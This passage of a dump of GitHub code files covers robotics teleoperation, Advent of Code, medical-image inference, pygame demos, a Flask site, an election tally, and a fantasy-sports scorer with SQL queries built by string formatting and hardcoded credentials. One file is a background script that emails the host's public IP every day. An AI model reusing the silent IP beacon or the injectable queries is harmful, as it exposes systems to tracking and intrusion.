log_settings)\n resolution = log_settings[\"image_resolution\"]\n quality = log_settings[\"image_quality\"]\n\n # this goes from 21ms to 120ms\n rgb_depth = mover.get_rgb_depth()\n\n points, colors = rgb_depth.ptcloud.reshape(-1, 3), rgb_depth.rgb.reshape(-1, 3)\n colors = colors / 255.\n\n # TODO Temporary hack to get semantic map in dashboard\n if end_to_end_vis is not None:\n rgb_depth.rgb = end_to_end_vis[:, :, [2, 1, 0]]\n elif modular_vis is not None:\n semantic_map_vis = mover.nav.get_last_semantic_map_vis()\n semantic_map_vis.wait()\n rgb_depth.rgb = semantic_map_vis.value[:, :, [2, 1, 0]]\n\n # this takes about 1.5 to 2 fps\n serialized_image = rgb_depth.to_struct(resolution, quality)\n\n sio.emit(\"rgb\", serialized_image[\"rgb\"])\n sio.emit(\"depth\", {\n \"depthImg\": serialized_image[\"depth_img\"],\n \"depthMax\": serialized_image[\"depth_max\"],\n \"depthMin\": serialized_image[\"depth_min\"],\n })\n\n if all_points is None:\n all_points = points\n all_colors = colors\n else:\n all_points = np.concatenate((all_points, points), axis=0)\n all_colors = np.concatenate((all_colors, colors), axis=0)\n\n opcd = o3d.geometry.PointCloud()\n opcd.points = o3d.utility.Vector3dVector(all_points)\n opcd.colors = o3d.utility.Vector3dVector(all_colors)\n opcd = opcd.voxel_down_sample(0.03)\n\n all_points = np.asarray(opcd.points)\n all_colors = np.asarray(opcd.colors)\n \n o3dviz.put('pointcloud', opcd)\n # obstacle, cpcd, crop, bbox, rest = mover.is_obstacle_in_front(return_viz=True)\n # if obstacle:\n # crop.paint_uniform_color([0.0, 1.0, 1.0])\n # rest.paint_uniform_color([1.0, 0.0, 1.0])\n # else:\n # crop.paint_uniform_color([1.0, 1.0, 0.0])\n # rest.paint_uniform_color([0.0, 1.0, 0.0])\n # o3dviz.put(\"cpcd\", cpcd)\n # o3dviz.put(\"bbox\", bbox)\n # o3dviz.put(\"crop\", crop)\n # o3dviz.put(\"rest\", rest)\n \n # print(mover.bot.is_obstacle_in_front())\n\n # Plot the robot\n x, y, yaw = base_state.tolist()\n\n if backend == 'locobot':\n height = 0.63\n else: # hello-robot\n height = 1.41\n o3dviz.add_robot(base_state, height)\n\n # start the SLAM\n # if backend == 'habitat':\n # # mover.explore((19, 19, 0))\n\n # possible_object_goals = mover.bot.get_semantic_categories_in_scene()\n # if len(possible_object_goals) > 0:\n # object_goal = random.choice(tuple(possible_object_goals))\n # mover.move_to_object(object_goal, blocking=True)\n\n # # import sys\n # # sys.exit()\n # import os\n # os._exit(0)\n \n sio.emit(\n \"map\",\n {\"x\": x, \"y\": y, \"yaw\": yaw, \"map\": mover.get_obstacles_in_canonical_coords()},\n )\n\n # s = input('...')\n time.sleep(0.001)\n","repo_name":"facebookresearch/fairo","sub_path":"agents/locobot/teleop.py","file_name":"teleop.py","file_ext":"py","file_size_in_byte":12820,"program_lang":"python","lang":"en","doc_type":"code","stars":826,"dataset":"github-code","pt":"54"} +{"seq_id":"33061129037","text":"#!/usr/bin/python3\n\n# http://adventofcode.com/2017/day/13\n\nwith open(\"input\") as inputfile:\n\tlines = inputfile.read().splitlines()\n\tlayers = {int(x.split(\": \")[0]) : int(x.split(\": \")[1]) for x in lines}\n\tmaxdepth = max(layers.keys())\n\n\tdelay = 0\n\tcaught = True\n\n\twhile caught:\n\t\tcaught = False\t\n\t\ttime = delay\n\t\tseverity = 0\n\t\tfor depth in range(maxdepth+1):\n\t\t\tif depth in layers:\t\t\n\t\t\t\tlrange = layers[depth]\n\n\t\t\t\trtt = 2*(lrange-1) # round trip time (up and down)\n\n\t\t\t\tif time%rtt == 0:\n\t\t\t\t\tcaught = True\n\t\t\t\t\t#print(\"caught on layer\", depth, time)\n\t\t\t\t\tif delay == 0: # part 1 only\n\t\t\t\t\t\tseverity += depth*lrange\n\t\t\t\t\telse: # in part 2 we do not need the severity, so we can skip the rest of the layers\n\t\t\t\t\t\tbreak\n\t\t\t\n\t\t\ttime += 1\t\t\n\n\t\tif delay == 0:\n\t\t\tprint(\"part 1: \", severity)\n\t\t\tprint(\"Calculating part 2...\")\n\n\t\tif not caught:\n\t\t\tprint(\"part 2\", delay)\n\t\t\n\t\tdelay += 1","repo_name":"simonhessner/adventofcode-2017","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38625913139","text":"import argparse\nimport numpy as np\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\nimport yaml\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom models import SiimCovidAuxModel\nfrom dataset import SiimCovidCLSTestDataset, classes\nfrom utils import seed_everything\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nparser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"--cfg\", default='configs/seresnet152d_512_unet.yaml', type=str)\nparser.add_argument(\"--folds\", default=[0,1,2,3,4], nargs=\"+\", type=int)\nparser.add_argument(\"--batch-size\", default=8, type=int)\nparser.add_argument(\"--workers\", default=16, type=int)\nparser.add_argument(\"--ckpt_dir\", default='checkpoints_v4', type=str)\nargs = parser.parse_args()\nprint(args)\n\nSEED = 123\nseed_everything(SEED)\n\nif __name__ == \"__main__\":\n os.makedirs('predictions', exist_ok = True)\n\n with open(args.cfg) as f:\n cfg = yaml.load(f, Loader=yaml.FullLoader)\n print(cfg)\n\n test_df = pd.read_csv('../../dataset/siim-covid19-detection/test_meta.csv')\n\n models = {}\n for fold in args.folds:\n CHECKPOINT = '{}/{}_{}_{}_aux_fold{}.pth'.format(args.ckpt_dir, cfg['encoder_name'], cfg['aux_image_size'], cfg['decoder'], fold)\n models[fold] = SiimCovidAuxModel(\n encoder_name=cfg['encoder_name'],\n encoder_weights=None,\n decoder=cfg['decoder'],\n classes=len(classes),\n in_features=cfg['in_features'],\n decoder_channels=cfg['decoder_channels'],\n encoder_pretrained_path=None,\n encoder_pretrained_num_classes=None,\n model_pretrained_path=None, \n model_pretrained_num_classes=None,\n test_mode=True).cuda()\n models[fold].load_state_dict(torch.load(CHECKPOINT))\n models[fold].eval()\n\n test_dataset = SiimCovidCLSTestDataset(\n df=test_df,\n images_dir='../../dataset/siim-covid19-detection/images/test',\n image_size=cfg['aux_image_size'])\n \n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers)\n print('Test size: {}'.format(len(test_loader.dataset)))\n\n preds = []\n imageids = []\n for ids, images, images_center_crop in tqdm(test_loader):\n images = images.cuda()\n images_center_crop = images_center_crop.cuda()\n imageids.extend(ids)\n\n pred = []\n with torch.cuda.amp.autocast(), torch.no_grad():\n for fold in args.folds:\n pred.append(torch.sigmoid(models[fold](images)))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(3,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(2,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images, dims=(2,3)).contiguous())))\n pred.append(torch.sigmoid(models[fold](images_center_crop)))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(3,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(2,)).contiguous())))\n pred.append(torch.sigmoid(models[fold](torch.flip(images_center_crop, dims=(2,3)).contiguous())))\n\n pred = torch.mean(torch.stack(pred, -1),-1).data.cpu().numpy()\n preds.append(pred)\n del pred\n\n preds = np.concatenate(preds, axis=0)\n imageids = np.array(imageids)\n\n pred_dict = dict(zip(imageids, preds))\n pred_dict_path = 'predictions/{}_{}_{}_aux_fold{}_test_pred_8tta.pth'.format(cfg['encoder_name'], cfg['aux_image_size'], cfg['decoder'], '_'.join(str(x) for x in args.folds))\n torch.save({\n 'pred_dict': pred_dict,\n }, pred_dict_path)\n","repo_name":"dungnb1333/SIIM-COVID19-Detection","sub_path":"src/classification_aux/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"54"} +{"seq_id":"3476245416","text":"from datetime import date\n\nimport logging\nimport sys\nimport mysql.connector\n\n\nclass FantasyPointCalculator():\n\tDRAFT_DAY = \"DRAFT_DAY\"\n\tDRAFT_KINGS = \"DRAFT_KINGS\"\n\tFAN_DUEL = \"FAN_DUEL\"\n\tSTAR_STREET = \"STAR_STREET\"\n\t\n\tALL_SITES = [DRAFT_DAY, DRAFT_KINGS, STAR_STREET]\n\n\tdef __init__(self, cnx = None, site=None, season=None):\n\t\tself.site = site\n\t\tself.season = season\n\t\t\n\t\t# Use dependency injection to determine where the database connection comes from.\n\t\tif not cnx:\n\t\t\tself.cnx = mysql.connector.connect(user='fantasy', password='fantasy', host='localhost', database='basketball_reference')\n\t\telse:\n\t\t\tself.cnx = cnx\n\n\tdef read_cli(self):\n\t\tself.site = \"\"\n\t\tself.season = date.today().year\n\n\t\tfor arg in sys.argv:\n\t\t\tif arg == \"fantasy_point_calculator.py\":\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tpieces = arg.split(\"=\")\n\t\t\t\tif pieces[0] == \"site\":\n\t\t\t\t\tself.site = pieces[1]\n\t\t\t\telif pieces[0] == \"season\":\n\t\t\t\t\tself.season = int(pieces[1])\n\n\tdef calculate(self, stats):\n\t\tfantasy_points = 0\n\t\n\t\tif self.site == self.DRAFT_DAY:\n\t\t\tmissed_shots = (stats[\"field_goal_attempts\"] - stats[\"field_goals\"]) + (stats[\"three_point_field_goal_attempts\"] - stats[\"three_point_field_goals\"]) + (stats[\"free_throw_attempts\"] - stats[\"free_throws\"])\n\t\t\t\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1) - (missed_shots * 0.25)\n\t\t\t\n\t\t\t# 1 point bonus for 3 pointer made\n\t\t\tfantasy_points = fantasy_points + stats[\"three_point_field_goals\"]\n\n\t\t\ttriple_or_double_double = 0\n\t\t\tcriteria = [stats[\"points\"], stats[\"total_rebounds\"], stats[\"assists\"], stats[\"steals\"], stats[\"blocks\"]]\n\t\t\tfor c in criteria:\n\t\t\t\tif c >= 10:\n\t\t\t\t\ttriple_or_double_double = triple_or_double_double + 1\n\n\t\t\tif triple_or_double_double == 2:\n\t\t\t\tfantasy_points = fantasy_points + 2\n\t\t\telif triple_or_double_double == 3:\n\t\t\t\tfantasy_points = fantasy_points + 2\n\t\t\n\t\telif self.site == self.DRAFT_KINGS:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 0.5)\n\t\t\t\n\t\t\t# 1 point bonus for 3 pointer made\n\t\t\tfantasy_points = fantasy_points + (stats[\"three_point_field_goals\"] * 0.5)\n\n\t\t\ttriple_or_double_double = 0\n\t\t\tcriteria = [stats[\"points\"], stats[\"total_rebounds\"], stats[\"assists\"], stats[\"steals\"], stats[\"blocks\"]]\n\t\t\tfor c in criteria:\n\t\t\t\tif c >= 10:\n\t\t\t\t\ttriple_or_double_double = triple_or_double_double + 1\n\n\t\t\tif triple_or_double_double == 2:\n\t\t\t\tfantasy_points = fantasy_points + 1.5\n\t\t\telif triple_or_double_double == 3:\n\t\t\t\tfantasy_points = fantasy_points + 3\n\t\t\n\t\telif self.site == self.FAN_DUEL:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.2) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1)\n\t\t\n\t\telif self.site == self.STAR_STREET:\n\t\t\tfantasy_points = stats[\"points\"] + (stats[\"total_rebounds\"] * 1.25) + (stats[\"assists\"] * 1.5) + (stats[\"steals\"] * 2) + (stats[\"blocks\"] * 2) - (stats[\"turnovers\"] * 1)\n\t\t\t\n\t\treturn fantasy_points\n\t\n\t#################################################################################################\n\t# This function gets executed as a stand-alone script.\n\t#\n\t# It will query all entries in game_totals_basic that don't have a corresponding fantasy_points\n\t# row, compute the fantasy points for each, and insert a row into the fantasy_points table.\n\t#################################################################################################\n\tdef run(self):\n\t\tcursor = self.cnx.cursor()\n\t\tstat_list = []\n\t\tall_ids = {}\n\t\tfrom_fantasy_points = {}\n\n\t\tif self.season:\n\t\t\tquery = \"select id from game_totals_basic where season = {}\".format(self.season)\n\t\telse:\n\t\t\tquery = \"select id from game_totals_basic\"\n\n\t\ttry:\n\t\t\tlogging.info(\"Querying for all ids in game_totals_basic\")\n\t\t\tcursor.execute(query)\n\t\t\tfor result in cursor:\n\t\t\t\tall_ids[result[0]] = 1\n\t\t\t\n\t\t\tlogging.info(\"Querying for game_totals_basic_ids in fantasy_points for {}\".format(self.site))\n\t\t\tif self.season:\n\t\t\t\tquery = \"select game_totals_basic_id from fantasy_points where site = '{}' and season = {}\".format(\n\t\t\t\t\tself.site, self.season)\n\t\t\telse:\n\t\t\t\tquery = \"select game_totals_basic_id from fantasy_points where site = '{}'\".format(self.site)\n\n\t\t\tcursor.execute(query)\n\t\t\tfor result in cursor:\n\t\t\t\tfrom_fantasy_points[result[0]] = 1\n\t\t\t\n\t\t\tlogging.info(\"Filtering out existing ids\")\n\t\t\tvalid_ids = []\n\t\t\tfor k in from_fantasy_points:\n\t\t\t\tdel all_ids[k]\n\t\t\t\n\t\t\tfor k in all_ids:\n\t\t\t\tvalid_ids.append(k)\n\t\t\t\n\t\t\tlogging.info(\"Retrieving game_totals_basic rows that have not yet been computed for fantasy points.\")\n\t\t\t\n\t\t\tcount = 1\n\t\t\ttotal = len(valid_ids)\n\t\t\tfor id in valid_ids:\n\t\t\t\tif count % 10 == 0:\n\t\t\t\t\tlogging.info(\"Retrieved %d of %d\" % (count, total))\n\t\t\t\tcursor.execute(\"select * from game_totals_basic where id = {}\".format(id))\n\n\t\t\t\t# Collect list of stat lines that don't have fantasy points computed.\n\t\t\t\tfor (result) in cursor:\n\t\t\t\t\tstats = {}\n\t\t\t\t\n\t\t\t\t\tstats[\"id\"] = result[0]\n\t\t\t\t\tstats[\"player_id\"] = result[1]\n\t\t\t\t\tstats[\"season\"] = result[2]\n\t\t\t\t\tstats[\"game_number\"] = result[3]\n\t\t\t\t\tstats[\"field_goals\"] = result[12]\n\t\t\t\t\tstats[\"field_goal_attempts\"] = result[13]\n\t\t\t\t\tstats[\"three_point_field_goals\"] = result[15]\n\t\t\t\t\tstats[\"three_point_field_goal_attempts\"] = result[16]\n\t\t\t\t\tstats[\"free_throws\"] = result[18]\n\t\t\t\t\tstats[\"free_throw_attempts\"] = result[19]\n\t\t\t\t\tstats[\"total_rebounds\"] = result[23]\n\t\t\t\t\tstats[\"assists\"] = result[24]\n\t\t\t\t\tstats[\"steals\"] = result[25]\n\t\t\t\t\tstats[\"blocks\"] = result[26]\n\t\t\t\t\tstats[\"turnovers\"] = result[27]\n\t\t\t\t\tstats[\"points\"] = result[29]\n\t\t\t\n\t\t\t\t\tstat_list.append(stats)\n\t\t\t\t\n\t\t\t\tcount += 1\n\t\tfinally:\n\t\t\tcursor.close()\n\t\t\n\t\t# Calculate fantasy points and insert into the database.\n\t\tcount = 0\n\t\tcursor = self.cnx.cursor()\n\t\ttry:\n\t\t\tfor s in stat_list:\n\t\t\t\tfantasy_points = self.calculate(s)\n\t\n\t\t\t\tinsert_query = (\"\"\"insert into fantasy_points (game_totals_basic_id, player_id, site, season, game_number, points) \n\t\t\t\tvalues ({},'{}','{}',{},{},{})\"\"\").format(s[\"id\"], s[\"player_id\"], self.site, s[\"season\"], s[\"game_number\"], fantasy_points)\n\t\t\t\tcursor.execute(insert_query)\n\t\t\t\t\n\t\t\t\tcount += 1\n\t\t\t\t\n\t\t\t\tif count % 10 == 0:\n\t\t\t\t\tlogging.info(\"Processed {} games\".format(count))\n\t\tfinally:\n\t\t\tcursor.close()\n","repo_name":"dmaclean/dfs-python","sub_path":"nba/fantasy_point_calculator.py","file_name":"fantasy_point_calculator.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"18958381707","text":"import math\n\nfrom config import *\nimport pygame\n\npygame.init()\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nx1, y1 = [WIDTH//2, HEIGHT//2]\na, b = WIDTH//2, HEIGHT//2\nrun = True\nwhile run:\n screen.fill(\"#000011\")\n event = pygame.event.get()\n\n for ev in event:\n if ev.type == pygame.QUIT:\n run = False\n x, y = pygame.mouse.get_pos()\n\n cof = (y1 - y) / ((x1 - x) ** 2 + (y1 - y) ** 2) ** 0.5\n pygame.draw.circle(screen, '#645964', (100, 100), 10)\n\n pygame.draw.circle(screen, '#645964', (a, b), 10)\n\n a += round(cof, 2) * 5\n b += round(cof, 2) * 5\n\n pygame.display.set_caption(f'FPS {round(clock.get_fps())}')\n pygame.display.update()\n clock.tick(FPS)\n","repo_name":"innokent14/Panzer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28409080568","text":"import json\nimport os\nimport requests\nfrom flask import Flask, render_template, request\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, TextAreaField\nfrom wtforms.validators import DataRequired, length, Email\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n\ndb_path = \"sqlite:///\" + os.path.join(basedir, 'data.sqlite')\n\napp.config['SECRET_KEY'] = \"this_is_secret_key\"\napp.config['SQLALCHEMY_DATABASE_URI'] = db_path\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nMigrate(app, db)\n\n\nclass UserModel(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String)\n email = db.Column(db.String)\n location = db.relationship('Location', backref='user', lazy=True, uselist=False)\n\n def __init__(self, username, email, location):\n self.username = username\n self.email = email\n self.location = location\n\n def __repr__(self):\n return f\"User {self.username} with email: {self.email}\"\n\n @classmethod\n def save(cls, name, email, location):\n user = cls.query.filter_by(email=email).first()\n if user:\n user.username = name\n user.email = email\n user.location = location\n else:\n user = cls(name, email, location)\n db.session.add(user)\n db.session.commit()\n\n @classmethod\n def rm(cls, email):\n user = cls.query.filter_by(email=email).first()\n db.session.delete(user)\n db.session.commit()\n\n @classmethod\n def get(cls, email):\n return cls.query.filter_by(email=email).all()\n\n\nclass Location(db.Model):\n __tablename__ = \"locations\"\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String)\n user_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"))\n\n def __init__(self, address, user_id):\n self.address = address\n self.user_id = user_id\n\n def __repr__(self):\n return f\"User {self.user_id} at address: {self.address}\"\n\n @classmethod\n def save(cls, str_address, user_id):\n address = cls.query.filter_by(user_id=user_id).first()\n if address:\n address.address = str_address\n address.user_id = user_id\n else:\n address = cls(str_address, user_id)\n db.session.add(address)\n db.session.commit()\n\n @classmethod\n def rm(cls, user_id):\n address = cls.query.filter_by(user_id=user_id).first()\n db.session.delete(address)\n db.session.commit()\n\n @classmethod\n def get(cls, user_id):\n return cls.query.filter_by(user_id=user_id).all()\n\n\nclass FormModel(db.Model):\n __tablename__ = \"messages\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n email = db.Column(db.String)\n textarea = db.Column(db.String)\n\n def __init__(self, name, email, textarea):\n self.name = name\n self.email = email\n self.textarea = textarea\n\n @classmethod\n def save(cls, name, email, textarea):\n message = cls.query.filter_by(email=email).first()\n if message:\n message.username = name\n message.email = email\n message.textarea = textarea\n else:\n message = cls(name, email, textarea)\n db.session.add(message)\n db.session.commit()\n\n @classmethod\n def rm(cls, id):\n message = cls.query.filter_by(id=id).first()\n db.session.delete(message)\n db.session.commit()\n\n @classmethod\n def get(cls, id):\n return cls.query.filter_by(id=id).first()\n\n\nclass FormName(FlaskForm):\n name = StringField(\"Name\")\n email = StringField(\"Email\", [DataRequired(), length(max=100, min=5), Email(\"Field should be real Email\")])\n textarea = TextAreaField(\"Message\", [DataRequired(), length(min=5)])\n submit = SubmitField(\"Send\")\n\n\n@app.route('/')\ndef home():\n return render_template('page.html')\n\n\n@app.route('/about_us')\ndef about():\n resp = requests.get(\"https://jsonplaceholder.typicode.com/users\")\n data = json.loads(resp.text)\n return render_template('about.html', data=data)\n\n\n@app.route('/contact_us', methods=['GET', 'POST'])\ndef contact():\n form = FormName(request.form)\n if form.validate_on_submit():\n email = form.email.data\n name = form.name.data\n textarea = form.textarea.data\n return render_template('contact.html', form=form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"UnilabEdu/UnilabPythonInternship","sub_path":"Chapter07_Database/Projects/2021/David_chincharashvili/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"18839368036","text":"# Script to explore finding if a point is in a polygon.\n\n# Video Walkthrough Link: https://www.youtube.com/watch?v=TA8XQgiao4M\n\nimport pygame\nfrom random import randint\n\n# Functions for determining if a point is inside a polygon.\ndef is_between(value, y1, y2):\n\tif ((y1 > y2 and y1 >= value > y2) or\n\t\ty2 >= value > y1):\n\t\treturn True\n\treturn False\n\ndef calc_intersection(point, side_a, side_b):\n\tm = (side_b[1]-side_a[1])/(side_b[0]-side_a[0])\n\tx = ((point[1]-side_a[1])/m) + side_a[0]\n\ty = point[1]\n\treturn (x, y)\n\ndef is_inside(point, polygon):\n\tcount = 0\n\tfor i in range(0, len(polygon)):\n\t\ta = polygon[i-1]\n\t\tb = polygon[i]\n\t\tif (a[1] != b[1] and\n\t\t\tis_between(point[1], a[1], b[1])):\n\t\t\tintersection = calc_intersection(point, a, b)\n\t\t\tif intersection[0] >= point[0]:\n\t\t\t\tcount += 1\n\tif count % 2 == 0:\n\t\treturn False\n\treturn True\n\n\n# The main program loop.\ndef main():\n\tpygame.init()\n\tWIDTH, HEIGHT = 500, 500\n\tscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\tclock = pygame.time.Clock()\n\n\tbg = pygame.Surface((WIDTH, HEIGHT))\n\tbg.fill((20,20,20))\n\n\tpoly = [(250, 100), (400, 200), (350, 360),\n\t\t\t\t(150, 360), (100, 200)]\n\n\trandom_points = []\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\texit()\n\n\t\t# Displaying the background surface.\n\t\tscreen.blit(bg, (0, 0))\n\n\t\t# \n\t\tfor point in random_points:\n\t\t\tif is_inside(point, poly):\n\t\t\t\tpygame.draw.circle(screen, (255,50,50), point, 2)\n\t\t\telse:\n\t\t\t\tpygame.draw.circle(screen, (255,255,100), point, 2)\n\n\t\t# Draw polygon.\n\t\tfor x in range(0, len(poly)):\n\t\t\tpygame.draw.aaline(screen, (255,255,255), poly[x], poly[x-1])\n\n\t\tx = randint(0, WIDTH)\n\t\ty = randint(0, HEIGHT)\n\t\trandom_points.append((x,y))\n\n\t\tpygame.display.update()\n\t\tclock.tick(30)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"EruditeCode/game_functions","sub_path":"point_in_polygon.py","file_name":"point_in_polygon.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38827555539","text":"'''\r\nSend an email testing\r\n'''\r\n\r\nimport smtplib\r\nfrom urllib.request import urlopen\r\nimport datetime as dt\r\nimport time\r\n\r\n'''\r\n---mail of the receiver\r\n---mail of the sender\r\n---password mail of the sender\r\n'''\r\n\r\nRECEIVER = \"\"\r\nMAIL = \"\"\r\nPWD = \"\"\r\n\r\n# run with pythonw\r\n# Send an email at a fixed hour of the day running as a background task\r\n\r\nwhile True:\r\n if dt.datetime.today().hour == 21:\r\n ip = urlopen(\"https://ip.42.pl/raw\").read()\r\n\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(MAIL, PWD)\r\n\r\n msg = f\"l'indirizzo ip e' {ip.decode('utf-8')}\"\r\n # from mail - to mail - msg\r\n server.sendmail(MAIL , RECEIVER, msg)\r\n\r\n server.quit()\r\n\r\n # 1 msg every then it sleeps 1 hour\r\n time.sleep(60*60)\r\n","repo_name":"jameszaupa/Public-IP-to-your-Mail","sub_path":"public_ip_to_mail.pyw","file_name":"public_ip_to_mail.pyw","file_ext":"pyw","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32166574792","text":"import os\nimport csv\n\ntotal_votes = 0\n\n#dictionary for vote count per candidate\nvote_count = {}\n\n#path to get data from election_data.csv and outputting it to a text file\nelection_data = os.path.join('..','PyPoll','election_data.csv')\noutput_text = os.path.join(\"PyPoll.txt\")\n\n#reader for election_data.csv\nwith open(election_data, 'r') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n header = next(csv_reader)\n \n #loop through rows in election_data.csv, skipping the header \n for row in csv_reader:\n \n #add up total votes\n total_votes = total_votes + 1\n \n #if steatement that counts the votes per candidate\n if row[2] in vote_count:\n vote_count[row[2]]+=1\n \n else:\n vote_count[row[2]] = 1\n \n \n#print results to shell \nprint(\"Election Results\")\nprint(\"------------------------------\")\nprint(\"Total Votes: \" + str(total_votes))\nprint(\"------------------------------\")\n\n#for steatemnt that prints name, vote % and vote count by using a key/value pairing from the dictionary\n#.items() returns the sequence of tuples in vote_count\nfor key, value in vote_count.items():\n print(key + \": \" + '%.3f' %(vote_count.get(key) * 100/ total_votes) + \"% (\" + str(value) +\")\")\nprint(\"------------------------------\")\n\n\n#print the winner by finding the max # of votes in the vote count dictionary \nprint(\"Winner: \" + max(vote_count, key = vote_count.get))\nprint(\"------------------------------\")\n\n\n#write the answers to a text file \nfile = open(output_text, \"w\")\nfile.write(\"Election Results\\n\")\nfile.write(\"------------------------------\\n\")\nfile.write(\"Total Votes: \" + str(total_votes) + \"\\n\")\nfile.write(\"------------------------------\\n\")\nfor key, value in vote_count.items():\n file.write(key + \": \" + '%.3f' %(vote_count.get(key) * 100/ total_votes) + \"% (\" + str(value) +\")\\n\")\nfile.write(\"------------------------------\\n\")\nfile.write(\"Winner: \" + max(vote_count, key = vote_count.get) + \"\\n\")\nfile.write(\"------------------------------\\n\")\n\nfile.close()","repo_name":"nrdeering/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29976519490","text":"# 在MATLAB中,有一个非常有用的函数 reshape,它可以将一个矩阵重塑为另一个大小不同的新矩阵,但保留其原始数据。 \n# \n# 给出一个由二维数组表示的矩阵,以及两个正整数r和c,分别表示想要的重构的矩阵的行数和列数。 \n# \n# 重构后的矩阵需要将原始矩阵的所有元素以相同的行遍历顺序填充。 \n# \n# 如果具有给定参数的reshape操作是可行且合理的,则输出新的重塑矩阵;否则,输出原始矩阵。 \n# \n# 示例 1: \n# \n# \n# 输入: \n# nums = \n# [[1,2],\n# [3,4]]\n# r = 1, c = 4\n# 输出: \n# [[1,2,3,4]]\n# 解释:\n# 行遍历nums的结果是 [1,2,3,4]。新的矩阵是 1 * 4 矩阵, 用之前的元素值一行一行填充新矩阵。\n# \n# \n# 示例 2: \n# \n# \n# 输入: \n# nums = \n# [[1,2],\n# [3,4]]\n# r = 2, c = 4\n# 输出: \n# [[1,2],\n# [3,4]]\n# 解释:\n# 没有办法将 2 * 2 矩阵转化为 2 * 4 矩阵。 所以输出原矩阵。\n# \n# \n# 注意: \n# \n# \n# 给定矩阵的宽和高范围在 [1, 100]。 \n# 给定的 r 和 c 都是正数。 \n# \n# Related Topics 数组 \n# 👍 169 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n m, n = len(nums), len(nums[0]) # 原始矩阵的行列\n if m * n != r * c: # 如果新矩阵的行列乘积<>原始矩阵的行列乘积,即不能重塑\n return nums\n # 初始化重塑矩阵\n res = [[0] * c for _ in range(r)]\n row = col = 0\n for i in range(m):\n for j in range(n):\n if col == c:\n row += 1\n col = 0\n res[row][col] = nums[i][j]\n col += 1\n return res\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"CatonChen/study_made_me_happy","sub_path":"leetcode/editor/cn/[566]重塑矩阵.py","file_name":"[566]重塑矩阵.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22642732137","text":"import numpy as np\nfrom keras.applications.resnet import ResNet50, preprocess_input\n\nfrom jina import Executor, requests, DocumentArray\nfrom PIL import Image\nfrom jina.logging.logger import JinaLogger\n\nclass ImageProcessor(Executor):\n def __init__(self, **kwargs):\n super().__init__()\n self.logger = JinaLogger(self.__class__.__name__)\n\n self.enable_rescale = True\n self.rescale_height = 224\n self.rescale_width = 224\n\n # self.enable_normalization = False\n # self.type = 